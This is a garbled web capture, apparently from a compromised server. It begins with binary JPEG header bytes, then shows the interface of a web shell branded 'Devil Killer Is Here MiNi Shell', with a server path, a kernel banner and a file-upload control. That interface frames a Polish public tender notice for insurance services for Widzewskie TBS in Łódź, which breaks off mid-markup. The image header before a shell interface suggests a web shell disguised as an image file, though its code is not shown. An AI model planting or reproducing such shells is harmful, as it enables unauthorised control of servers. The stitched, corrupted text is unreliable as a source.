JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241104/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241104/0057773201-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług ubezpieczeniowych dla Widzewskiego TBS Sp. z o.o. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Widzewskie TBS Sp. z o.o.</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Widzewskie TBS Sp. z o.o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 471691321</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Piłsudskiego 150/152</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łódź</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">92-230</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL711 - Miasto Łódź</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">wtbs@wtbs.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wtbs.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług ubezpieczeniowych dla Widzewskiego TBS Sp. z o.o. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4cd385a2-9689-4105-9c02-57a85249fc89</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00577732</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/wtbs <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.3.) Informacje na temat sposobu udostępnienia zastrzeżonych dokumentów zamówienia</h3> 3.6.1.	Zamawiający na podstawie art. 18 ust. 4 ustawy PZP nadaje Klauzulę poufności poniższym Załącznikom:<br/>-	Załącznik Nr 1 - Przedmiot ubezpieczenia (CZĘŚĆ Nr 1; CZĘŚĆ Nr 2) <br/>-	Załącznik Nr 2 –Wykaz i lokalizacje ubezpieczanego mienia_ryzyk<br/>-	Załącznik Nr 3 - Zestawienie: sumy ubezpieczenia, sumy gwarancyjne, limity, CZĘŚĆ Nr 1 <br/>-	Załącznik Nr 3a - Zestawienie: sumy ubezpieczenia, limity, CZĘŚĆ Nr 2<br/>-	Załącznik Nr 4 - Szkodowość <br/>-	Załącznik Nr 18 - Wzór Potwierdzenia Wykonawcy o dokonaniu Cesji<br/>3.6.2.	Wykonawca uzyska informacje o charakterze poufnym wnioskując do Zamawiającego z wykorzystaniem Załącznika Nr 24 do SWZ za pośrednictwem Platformy Zakupowej, zgodnie z postanowieniami pkt. 10 oraz 11 SWZ. <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/wtbs</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający wymagania techniczne i organizacyjne dot. korespondencji określił w pkt. 10, 11 i 19 SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>	administratorem Pani/Pana danych osobowych jest Widzewskie Towarzystwo Budownictwa Społecznego sp. z o.o., Al. Piłsudskiego 150/152, 92-230 Łódź<br/>	inspektorem ochrony danych osobowych w Widzewskim Towarzystwie Budownictwa Społecznego sp. z o.o., Al. Piłsudskiego 150/152, 92-230 Łódź jest Pani Katarzyna Chmielnicka, kontakt: adres e-mail Katarzyna.chmielnicka@wtbs.pl<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym postępowaniem o udzielenie zamówienia publicznego na:<br/>„Świadczenie usług ubezpieczeniowych dla Widzewskiego TBS Sp. z o.o.”<br/>	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy Pzp<br/>	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">10/DK/24</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.1	Przedmiotem zamówienia jest świadczenie usług ubezpieczeniowych dla Zamawiającego :<br/>3.1.1.	CZĘŚĆ Nr 1:<br/>3.1.1.1.	ubezpieczenie mienia (AR)<br/>3.1.1.2.	ubezpieczenie sprzętu elektronicznego (EEI AR)<br/>3.1.1.3.	ubezpieczenie odpowiedzialności cywilnej z tytułu prowadzenia działalności gospodarczej, posiadania i / lub użytkowania mienia (OC),<br/>3.1.1.4.	obowiązkowe ubezpieczenie odpowiedzialności cywilnej zarządcy nieruchomości (OC ZN)<br/>3.1.1.5.	ubezpieczenie komunikacyjne<br/>3.3.	Szczegółowy opis przedmiotu zamówienia zawarty jest w załącznikach do SWZ: Załączniki: Nr 1, Nr 2, Nr 3, Nr 3a oraz w projektowanych postanowieniach umów: Załącznik Nr 15, Załącznik Nr 23. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66510000-8 - Usługi ubezpieczeniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">66515100-4 - Usługi ubezpieczenia od ognia</p> <p class="mb-0">66515400-7 - Usługi ubezpieczenia od skutków żywiołów</p> <p class="mb-0">66515000-3 - Usługi ubezpieczenia od uszkodzenia lub utraty</p> <p class="mb-0">66516000-0 - Usługi ubezpieczenia od odpowiedzialności cywilnej</p> <p class="mb-0">66516400-4 - Usługi ubezpieczenia od ogólnej odpowiedzialności cywilnej</p> <p class="mb-0">66514110-0 - Usługi ubezpieczeń pojazdów mechanicznych</p> <p class="mb-0">66516100-1 - Usługi ubezpieczenia pojazdów mechanicznych od odpowiedzialności cywilnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 3.9.1.	Zamawiający uprawniony jest do realizacji zwiększonego zakresu umowy, określonego w §1 (zamówienie opcjonalne), maksymalnie do 16% wartości zamówienia podstawowego , w sytuacji:<br/>3.9.1.1.	Konieczności ubezpieczenia nowych składników aktywów trwałych,<br/>3.9.1.2.	Konieczności ubezpieczenia mienia, w związku z upływem okresu ubezpieczenia tego mienia w trakcie trwania niniejszej umowy,<br/>3.9.1.3.	Na zwiększony zakres umowy, wzrost kosztów ubezpieczenia (wzrost składki ubezpieczeniowej), w trakcie planowanego trzyletniego okresu związania się umową, wpływ może mieć:<br/>-	wskaźnik wartości odtworzeniowej 1 m2 (aktualne dane dwa razy w roku: marzec, wrzesień) ogłasza Wojewoda łódzki, wskaźnik ten nie jest tożsamy ze wskaźnikami inflacji ogłaszanymi przez GUS i bywa 2 x większy od wskaźników inflacji GUS<br/>-	wzrost wartości mienia (budynki, budowle) z wykorzystaniem wskaźnika wartości odtworzeniowej 1 m2 ogłaszanego przez Wojewodę łódzkiego, <br/>-	wskaźniki inflacji ogłaszane przez GUS wykorzystywane do uaktualnienia wartości odtworzeniowej pozostałego ubezpieczanego mienia, <br/>-	wzrost płacy minimalnej, uaktualnienie kosztów pracy Wykonawcy (Towarzystwa Ubezpieczeń), <br/>-	przyjmowanie na stan ukończonych inwestycji (budynki mieszkalne, garażowe, parkingi), <br/>-	zakupy nowego mienia (od niskocennych składników mienia do mienia o znacznej wartości, np. instalacja fotowoltaiczna, samochód, katalog otwarty, zadania pojawiające się na bieżąco w trakcie roku, wynikają z bieżących potrzeb, katalog otwarty), <br/>-	zmiana wartości mienia z powodu modernizacji (ogrodzenia, bramy, moniotoring, systemy alarmowe, klimatyzacja, katalog otwarty, zadania pojawiające się na bieżąco w trakcie roku, wynikają z bieżących potrzeb, katalog otwarty),<br/>-	rozszerzanie zakresu ubezpieczenia, co wcześniej nie było zaplanowane, (np. oc organizatora imprez z okazji n-lecia łodzi, happeningi, etc.,)<br/>-	zwiększanie składu osobowego zarządu Spółki (ubezpieczenie D&amp;O),<br/>-	przekroczenie akceptowalnego progu szkodowości określonego w umowie z Wykonawcą lub negatywna ocena kondycji finansowej Zamawiającego, <br/>-	trzeba rozszerzać zakres ubezpieczenia z powodu zdarzeń, które wcześniej nie były doświadczane i uwzględniane w programach ubezpieczeniowych. <br/>3.9.2.	Realizacja zamówienia opcjonalnego nastąpi z wykorzystaniem taryf: stóp składek, składek jednostkowych, składek zapisanych przez Wykonawcę w Załączniku Nr 3 do SWZ, z zastosowaniem zasady pro rata temporis, <br/>3.9.3.	W zakresie zamówienia opcjonalnego Wykonawca zobowiązany jest do rozpoczęcia świadczenia usług na podstawie pisemnego oświadczenia woli Zamawiającego o skorzystaniu z prawa opcji. Zamawiający przekaże Wykonawcy ww. oświadczenie w przedmiocie skorzystania z prawa opcji w określonym przez siebie zakresie w terminie co najmniej 7 dni roboczych przed planowanym rozpoczęciem realizowania przedmiotu zamówienia ujętego w prawie opcji przy czym Wykonawca jest obowiązany do jego wykonania. <br/>3.9.4.	Korzystanie z prawa opcji przez Zamawiającego może być dokonane jednorazowo na całą wartość zamówienia opcjonalnego lub w kilku częściach. W przypadku realizacji opcji w kilku częściach Zamawiający będzie składał Wykonawcy kolejne oświadczenia.<br/>3.9.5.	Zamówienie opcjonalne nie stanowi zobowiązania Zamawiającego do jego udzielenia, jak również nie stanowi podstawy do dochodzenia przez Wykonawcę roszczeń odszkodowawczych z tytułu niezrealizowania tego zamówienia. Oświadczenie woli Zamawiającego o realizacji zamówienia opcjonalnego jest wyłącznym uprawnieniem Zamawiającego. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">36 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje zamówienia, o których mowa w art. 214 ust. 1 pkt. 7 ustawy Pzp – w wysokości do 5% wartości zamówienia podstawowego. Szczegóły zostały opisane w pkt. 4.5.2. SWZ</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zachowanie taryf: stopy składek, składki jednostkowe, składki - na kolejny okres ubezpieczeniowy z progami / poziomami szkodowości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.1	Przedmiotem zamówienia jest świadczenie usług ubezpieczeniowych dla Zamawiającego:<br/>3.1.2.1.	ubezpieczenie odpowiedzialności członków władz spółek kapitałowych (D&amp;O)<br/>3.3.	Szczegółowy opis przedmiotu zamówienia zawarty jest w załącznikach do SWZ: Załączniki: Nr 1, Nr 2, Nr 3, Nr 3a oraz w projektowanych postanowieniach umów: Załącznik Nr 15, Załącznik Nr 23. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66510000-8 - Usługi ubezpieczeniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">66516000-0 - Usługi ubezpieczenia od odpowiedzialności cywilnej</p> <p class="mb-0">66515411-7 - Usługi ubezpieczenia od odpowiedzialności finansowej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 3.10.1.	Zamawiający uprawniony jest do realizacji zwiększonego zakresu umowy, określonego w § 1 (zamówienie opcjonalne), maksymalnie do 35% wartości zamówienia podstawowego w przypadku zwiększenia składu osobowego organów Zamawiającego.<br/>3.10.2.	Realizacja zamówienia opcjonalnego nastąpi z wykorzystaniem taryf: stóp składek, składek jednostkowych, składek zapisanych przez Wykonawcę w Załączniku Nr 3a do SWZ, z zastosowaniem zasady pro rata temporis.<br/>3.10.3.	W zakresie zamówienia opcjonalnego Wykonawca zobowiązany jest do rozpoczęcia świadczenia usług na podstawie pisemnego oświadczenia woli Zamawiającego o skorzystaniu z prawa opcji. Zamawiający przekaże Wykonawcy ww. oświadczenie w przedmiocie skorzystania z prawa opcji w określonym przez siebie zakresie w terminie co najmniej 7 dni roboczych przed planowanym rozpoczęciem realizowania przedmiotu zamówienia ujętego w prawie opcji przy czym Wykonawca jest obowiązany do jego wykonania. <br/>3.10.4.	Korzystanie z prawa opcji przez Zamawiającego może być dokonane jednorazowo na całą wartość zamówienia opcjonalnego lub w kilku częściach. W przypadku realizacji opcji w kilku częściach Zamawiający będzie składał Wykonawcy kolejne oświadczenia.<br/>3.10.5.	Zamówienie opcjonalne nie stanowi zobowiązania Zamawiającego do jego udzielenia, jak również nie stanowi podstawy do dochodzenia przez Wykonawcę roszczeń odszkodowawczych z tytułu niezrealizowania tego zamówienia. Oświadczenie woli Zamawiającego o realizacji zamówienia opcjonalnego jest wyłącznym uprawnieniem Zamawiającego. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">36 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">4.5.3.	CZĘŚĆ Nr 2 Zamawiający przewiduje zamówienia, o których mowa w art. 214 ust. 1 pkt. 7 ustawy Pzp – w wysokości do 10% wartości zamówienia podstawowego polegające na powtórzeniu tego rodzaju zamówienia oraz:<br/>4.5.3.1.	Ubezpieczenie odpowiedzialności członków władz spółek kapitałowych (D&amp;O).<br/>4.5.3.1.1.	podniesienie sumy gwarancyjnej, limitów w celu spełnienia wymagań kontrahentów Zamawiającego, <br/>4.5.3.1.2.	uzupełnienie sumy gwarancyjnej, limitów po wypłacie odszkodowania,<br/>4.5.3.1.3.	wynikających ze zwiększenia składu osobowego Zarządu Spółki<br/>4.5.3.1.4.	wynikających z bieżących potrzeb Zamawiającego<br/>4.5.3.1.5.	przedłużenie terminu ochrony. <br/>4.5.3.1.6.	w zależności od przedmiotu zamówienia / ryzyka, zastosowane zostaną następujące warunki. <br/>4.5.3.1.6.1.	w przypadku gdy przedmiotem zamówienia będzie: podniesienie sumy gwarancyjnej, podniesienie limitów w celu spełnienia wymagań Kontrahenta lub uzupełnienie sumy gwarancyjnej, uzupełnienie limitów po wypłacie odszkodowania składka będzie przedmiotem odrębnych negocjacji pomiędzy Zamawiającym i Wykonawcą o ile taryfy: stopy składek, składki jednostkowe, składki - nie zostały zapisane w ofercie. Składka zostanie naliczona proporcjonalnie do liczby dni udzielonej ochrony przez Wykonawcę zgodnie z zasadą pro rata temporis (bez warunku stosowania składki minimalnej). W przypadku negatywnej oceny finansowej Zamawiającego i / lub szkodowości zastosowanie mieć będzie § 4 ust. 8 Umowy (Załącznik Nr 23 do SWZ) <br/>4.5.3.1.6.2.	w przypadku gdy przedmiotem zamówienia będzie przedłużenie terminu ochrony - składka zostanie naliczona proporcjonalnie do liczby dni udzielonej ochrony przez Wykonawcę zgodnie z zasadą pro rata temporis z zastosowaniem taryf: stóp składek, składek jednostkowych, składek - zapisanych w ofercie (bez warunku stosowania składki minimalnej). W przypadku negatywnej oceny finansowej Zamawiającego i / lub szkodowości zastosowanie mieć będzie § 4 ust. 8 Umowy (Załącznik Nr 23 do SWZ)<br/>4.6.3.1.7.	zgodnie z zapisami § 6 Umowy na usługi ubezpieczenia (Załącznik Nr 23 do SWZ)<br/>4.6.3.1.8.	pozostałe / dodatkowe warunki, w szczególności zakres ochrony ubezpieczeniowej, będą zgodne z warunkami SWZ oraz ofertą Wykonawcy.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span 